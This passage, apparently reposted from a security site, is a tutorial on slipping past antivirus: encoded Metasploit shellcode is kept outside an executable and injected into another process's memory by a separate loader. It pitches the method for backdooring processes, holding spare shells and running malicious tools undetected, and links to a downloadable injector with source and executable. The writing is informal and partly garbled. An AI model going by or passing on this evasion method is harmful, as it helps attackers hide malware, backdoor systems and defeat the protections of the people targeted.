that AV is saying that file is clean (Reason: Because file is corrupted and AV have no option to unpack/decrypt it) fantastic that's all we want. Concept of Code Injection - Ingeneric way to bypass AV Because exe files are going to detected by AVs( at least if you pack them with the publicly exposed packers/encryptors). So we have to think in a another way. And the another way is: split the exe into two parts (not physically) The core code (the actual code that performs a specific task for eg. Bind shell) The interface - a mechanism that will inject the code into memory and execute that code. So the functioning is something like this: Note that from the above explanation we know that shellcode/code into a file is not going to be detected by AV because AV don't know how to decode shellcode. (Don't talk about Heuristic, I know AV vendors are joking ?) Important Note: you may be thinking that why I am saying encoded shellcode because if you use metasploit shellcodes there signatures may be in AVs. If you encode the shellcode with any available encoder in metasploit then AVs not able to decode it in a file and not able to detect it (if you don't understand it read the whole stuff again ?). Although in some cases (Eg. Avast may be with others also) AV not alert if you use shellcodes that are not encoded because AV think that txt file are lame files. But if you force fully scan the file than AV alert. Second part of the concept is the interface that will inject the code into a process. Code injection is not a new concept (dll injection is one of the most popular example). Note: All the things are generic and are not specific to any tool or shellcodes. Metasploit and shellcodes are used only to demonstrate the concept. You can also inject your codes "that are detectable to AV in exe mode" with this method and can bypass AV. Things that you can do with this method: Can backdoor a process Can provide many backup shells (every type) We can use publically available tool (malicious) without fear and too many other things limited to your wild imaginations. Download Injector You can click on below link to download the source code and executable for the Injector - Proof of Concept code. http://securityxploded.net/download/Injector.rar Sursa si video demo: Bypassing Anti-virus using Code Injection Technique | www.SecurityXploded.com